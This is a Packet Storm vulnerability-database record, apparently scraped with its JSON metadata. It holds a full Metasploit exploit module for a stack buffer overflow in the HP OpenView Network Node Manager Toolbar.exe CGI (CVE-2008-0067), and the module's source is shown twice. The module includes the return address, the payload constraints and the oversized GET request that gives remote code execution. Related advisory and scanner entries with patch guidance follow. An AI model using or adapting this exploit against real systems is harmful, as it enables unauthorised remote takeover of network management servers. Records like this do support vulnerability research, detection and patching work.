ID PACKETSTORM:103112
Type packetstorm
Reporter MC
Modified 2011-07-16T00:00:00
Description
`##
# $Id: hp_nnm_toolbar_01.rb 13192 2011-07-16 04:45:21Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.
By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute
arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 13192 $',
'References' =>
[
[ 'CVE', '2008-0067' ],
[ 'OSVDB', '53222' ],
[ 'BID', '33147' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => false,
'Payload' =>
{
'Space' => 650,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 7 2009'))
register_options( [ Opt::RPORT(80) ], self.class )
end
def exploit
sploit = rand_text_alpha_upper(5108) + [target.ret].pack('V') + payload.encoded
print_status("Trying target #{target.name}...")
send_request_raw({
'uri' => "/OvCgi/Toolbar.exe?" + sploit,
'method' => "GET",
}, 5)
handler
end
end
`
{"modified": "2011-07-16T00:00:00", "reporter": "MC", "history": [], "references": [], "href": "https://packetstormsecurity.com/files/103112/HP-OpenView-Network-Node-Manager-Toolbar.exe-CGI-Buffer-Overflow.html", "viewCount": 0, "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "title": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow", "id": "PACKETSTORM:103112", "lastseen": "2016-12-05T22:22:58", "objectVersion": "1.2", "type": "packetstorm", "edition": 1, "sourceData": "`## \n# $Id: hp_nnm_toolbar_01.rb 13192 2011-07-16 04:45:21Z sinn3r $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. \nBy sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute \narbitrary code. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 13192 $', \n'References' => \n[ \n[ 'CVE', '2008-0067' ], \n[ 'OSVDB', '53222' ], \n[ 'BID', '33147' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 650, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 7 2009')) \n \nregister_options( [ Opt::RPORT(80) ], self.class ) \nend \n \ndef exploit \n \nsploit = rand_text_alpha_upper(5108) + [target.ret].pack('V') + payload.encoded \n \nprint_status(\"Trying target #{target.name}...\") \n \nsend_request_raw({ \n'uri' => \"/OvCgi/Toolbar.exe?\" + sploit, \n'method' => \"GET\", \n}, 5) \n \n \nhandler \n \nend \n \nend \n`\n", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "406b89207a8819f5e65d25d75c0c553a"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "475d2913744923e97afbf6ae4bfa51d8"}, {"key": "modified", "hash": "93135c486d720efff40a265086929c9c"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "93135c486d720efff40a265086929c9c"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "92a54b358b4cf53cca4095e4697e1004"}, {"key": "sourceData", "hash": "b43eab32c3d111ff1e7bdb674bd80460"}, {"key": "sourceHref", "hash": "72c2bc5235627d4a30e2b4c879a20552"}, {"key": "title", "hash": "11b58e4610533ef5028a945362582645"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "published": "2011-07-16T00:00:00", "description": "", "cvelist": ["CVE-2008-0067"], "sourceHref": "https://packetstormsecurity.com/files/download/103112/hp_nnm_toolbar_01.rb.txt", "hash": "3eaea95b61b39bbb0e520cb77de6fb8b5eceaa0bb758252e23d99b982dbbfcb7", "enchantments": {"vulnersScore": 2.8}}
{"result": {"cve": [{"id": "CVE-2008-0067", "type": "cve", "title": "CVE-2008-0067", "description": "Multiple stack-based buffer overflows in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allow remote attackers to execute arbitrary code via (1) long string parameters to the OpenView5.exe CGI program; (2) a long string parameter to the OpenView5.exe CGI program, related to ov.dll; or a long string parameter to the (3) getcvdata.exe, (4) ovlaunch.exe, or (5) Toolbar.exe CGI program.", "published": "2009-01-08T14:30:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0067", "cvelist": ["CVE-2008-0067"], "lastseen": "2016-09-03T09:58:32"}], "saint": [{"id": "SAINT:0D54CC4C7F1DA98A4E8EE9297A724B3A", "type": "saint", "title": "HP OpenView Network Node Manager OpenView5.exe buffer overflow", "description": "Added: 03/23/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in the `**OpenView5.exe**` CGI program allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply one of the patches referenced in [HPSBMA02400 SSRT080144](<http://www.securityfocus.com/archive/1/500203>). \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53 on Windows 2000. \n\n### Platforms\n\nWindows \n \n\n", "published": "2009-03-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_openview5", "cvelist": ["CVE-2008-0067"], "lastseen": "2016-10-03T15:02:00"}, {"id": "SAINT:C9915F1810973BB36B625CD8469D6491", "type": "saint", "title": "HP OpenView Network Node Manager getcvdata.exe parameter string buffer overflow", "description": "Added: 01/14/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an HTTP request for the `**getcvdata.exe**` CGI program with a long, specially crafted parameter string. \n\n### Resolution\n\nRestrict access to the `**getcvdata.exe**` CGI program. Apply a fix when available. \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\n### Platforms\n\nWindows 2000 \n \n\n", "published": "2009-01-14T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getcvdata", "cvelist": ["CVE-2008-0067"], "lastseen": "2016-10-03T15:01:58"}, {"id": "SAINT:4DBEF05031B06AE05590661C70DB2247", "type": "saint", "title": "HP OpenView Network Node Manager Toolbar.exe CGI buffer overflow", "description": "Added: 01/09/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by requesting the `**Toolbar.exe**` CGI program with a long, specially crafted parameter. \n\n### Resolution\n\nApply a fix when available, or restrict access to the `**Toolbar.exe**` CGI program. \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.5 on Windows 2000. \n\n### Platforms\n\nWindows \n \n\n", "published": "2009-01-09T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_toolbar", "cvelist": ["CVE-2008-0067"], "lastseen": "2017-01-10T14:03:42"}, {"id": "SAINT:39218AED3A8A26FBC38498E29AE58B12", "type": "saint", "title": "HP OpenView Network Node Manager OpenView5.exe buffer overflow", "description": "Added: 03/23/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in the `**OpenView5.exe**` CGI program allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply one of the patches referenced in [HPSBMA02400 SSRT080144](<http://www.securityfocus.com/archive/1/500203>). \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53 on Windows 2000. \n\n### Platforms\n\nWindows \n \n\n", "published": "2009-03-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_openview5", "cvelist": ["CVE-2008-0067"], "lastseen": "2017-01-10T14:03:45"}, {"id": "SAINT:60781D8F8215D71A869B6AD65D30DCC1", "type": "saint", "title": "HP OpenView Network Node Manager Toolbar.exe CGI buffer overflow", "description": "Added: 01/09/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by requesting the `**Toolbar.exe**` CGI program with a long, specially crafted parameter. \n\n### Resolution\n\nApply a fix when available, or restrict access to the `**Toolbar.exe**` CGI program. \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.5 on Windows 2000. \n\n### Platforms\n\nWindows \n \n\n", "published": "2009-01-09T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_toolbar", "cvelist": ["CVE-2008-0067"], "lastseen": "2016-10-03T15:02:00"}, {"id": "SAINT:6FCA652A311F0464BEA896B694F06681", "type": "saint", "title": "HP OpenView Network Node Manager getcvdata.exe parameter string buffer overflow", "description": "Added: 01/14/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an HTTP request for the `**getcvdata.exe**` CGI program with a long, specially crafted parameter string. \n\n### Resolution\n\nRestrict access to the `**getcvdata.exe**` CGI program. Apply a fix when available. \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\n### Platforms\n\nWindows 2000 \n \n\n", "published": "2009-01-14T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getcvdata", "cvelist": ["CVE-2008-0067"], "lastseen": "2016-12-14T16:58:05"}, {"id": "SAINT:EB5CC2178A48D85450DEA40F8E9B5362", "type": "saint", "title": "HP OpenView Network Node Manager OpenView5.exe buffer overflow", "description": "Added: 03/23/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in the `**OpenView5.exe**` CGI program allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply one of the patches referenced in [HPSBMA02400 SSRT080144](<http://www.securityfocus.com/archive/1/500203>). \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53 on Windows 2000. \n\n### Platforms\n\nWindows \n \n\n", "published": "2009-03-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_openview5", "cvelist": ["CVE-2008-0067"], "lastseen": "2016-12-14T16:58:05"}, {"id": "SAINT:8DC4A670199A534D615433A9469A9871", "type": "saint", "title": "HP OpenView Network Node Manager Toolbar.exe CGI buffer overflow", "description": "Added: 01/09/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by requesting the `**Toolbar.exe**` CGI program with a long, specially crafted parameter. \n\n### Resolution\n\nApply a fix when available, or restrict access to the `**Toolbar.exe**` CGI program. \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.5 on Windows 2000. \n\n### Platforms\n\nWindows \n \n\n", "published": "2009-01-09T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_toolbar", "cvelist": ["CVE-2008-0067"], "lastseen": "2016-12-14T16:58:04"}, {"id": "SAINT:C597FB3A23C41837AF019180ED4384E3", "type": "saint", "title": "HP OpenView Network Node Manager getcvdata.exe parameter string buffer overflow", "description": "Added: 01/14/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an HTTP request for the `**getcvdata.exe**` CGI program with a long, specially crafted parameter string. \n\n### Resolution\n\nRestrict access to the `**getcvdata.exe**` CGI program. Apply a fix when available. \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\n### Platforms\n\nWindows 2000 \n \n\n", "published": "2009-01-14T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getcvdata", "cvelist": ["CVE-2008-0067"], "lastseen": "2017-01-10T14:03:43"}], "packetstorm": [{"id": "PACKETSTORM:83092", "type": "packetstorm", "title": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow", "description": "", "published": "2009-11-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/83092/HP-OpenView-Network-Node-Manager-Toolbar.exe-CGI-Buffer-Overflow.html", "cvelist": ["CVE-2008-0067"], "lastseen": "2016-12-05T22:21:19"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_TOOLBAR_01", "type": "metasploit", "title": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow", "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute arbitrary code.", "published": "2011-07-16T04:45:21", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2008-0067"], "lastseen": "2018-03-12T23:03:18"}], "exploitdb": [{"id": "EDB-ID:16795", "type": "exploitdb", "title": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow", "description": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow. CVE-2008-0067. Webapps exploit for cgi platform", "published": "2010-05-09T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16795/", "cvelist": ["CVE-2008-0067"], "lastseen": "2016-02-02T06:31:38"}, {"id": "EDB-ID:17536", "type": "exploitdb", "title": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow", "description": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow. CVE-2008-0067. Remote exploit for windows platform", "published": "2011-07-16T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/17536/", "cvelist": ["CVE-2008-0067"], "lastseen": "2016-02-02T08:04:01"}], "nessus": [{"id": "HPUX_PHSS_39245.NASL", "type": "nessus", "title": "HP-UX PHSS_39245 : s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 22", "description": "s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 22 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to execute arbitrary code. (HPSBMA02424 SSRT080125)\n\n - A potential vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to execute arbitrary code. (HPSBMA02425 SSRT080091)\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to allow execution of arbitrary code. (HPSBMA02400 SSRT080144)", "published": "2009-06-15T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=39383", "cvelist": ["CVE-2008-2438", "CVE-2008-0067", "CVE-2009-0720"], "lastseen": "2017-10-29T13:39:05"}, {"id": "HPUX_PHSS_39246.NASL", "type": "nessus", "title": "HP-UX PHSS_39246 : s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 22", "description": "s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 22 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to allow execution of arbitrary code. (HPSBMA02400 SSRT080144)\n\n - A potential vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to execute arbitrary code. (HPSBMA02424 SSRT080125)\n\n - A potential vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to execute arbitrary code. (HPSBMA02425 SSRT080091)", "published": "2009-06-15T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=39384", "cvelist": ["CVE-2008-2438", "CVE-2008-0067", "CVE-2009-0720"], "lastseen": "2017-10-29T13:35:33"}, {"id": "HPUX_PHSS_40705.NASL", "type": "nessus", "title": "HP-UX PHSS_40705 : s700_800 11.11 OV NNM7.01 Intermediate Patch 13", "description": "s700_800 11.11 OV NNM7.01 Intermediate Patch 13 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to execute arbitrary code. (HPSBMA02424 SSRT080125)\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to execute arbitrary code. References: CVE-2009-0898 (SSRT090101) CVE-2009-3845 (SSRT090037, ZDI-CAN-453) CVE-2009-3846 (SSRT090122, ZDI-CAN-526) CVE-2009-3847 (SSRT090128, ZDI-CAN-532) CVE-2009-3848 (SSRT090129, ZDI-CAN-522) CVE-2009-3849 (SSRT090130, ZDI-CAN-523) CVE-2009-4176 (SSRT090131, ZDI-CAN-532) CVE-2009-4177 (SSRT090132, ZDI-CAN-538) CVE-2009-4178 (SSRT090133, ZDI-CAN-539) CVE-2009-4179 (SSRT090134, ZDI-CAN-540) CVE-2009-4180 (SSRT090135, ZDI-CAN-542) CVE-2009-4181 (SSRT090164, ZDI-CAN-549). (HPSBMA02483 SSRT090257)\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to allow execution of arbitrary code. (HPSBMA02400 SSRT080144)\n\n - Potential vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). The vulnerabilities could be exploited remotely to execute arbitrary code. (HPSBMA02416 SSRT090008)\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to execute arbitrary code. References: CVE-2010-1550 (SSRT090225, ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564) CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553 (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229, ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - A potential vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to execute arbitrary code. (HPSBMA02425 SSRT080091)", "published": "2010-05-10T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=46261", "cvelist": ["CVE-2009-3848", "CVE-2009-3846", "CVE-2009-3847", "CVE-2009-4177", "CVE-2009-0921", "CVE-2009-4180", "CVE-2009-3849", "CVE-2009-0898", "CVE-2009-4181", "CVE-2010-1555", "CVE-2009-4176", "CVE-2009-4178", "CVE-2010-1552", "CVE-2009-4179", "CVE-2008-2438", "CVE-2009-0920", "CVE-2010-1550", "CVE-2008-0067", "CVE-2010-1554", "CVE-2010-1553", "CVE-2009-3845", "CVE-2009-0720", "CVE-2010-1551"], "lastseen": "2017-10-29T13:40:15"}]}}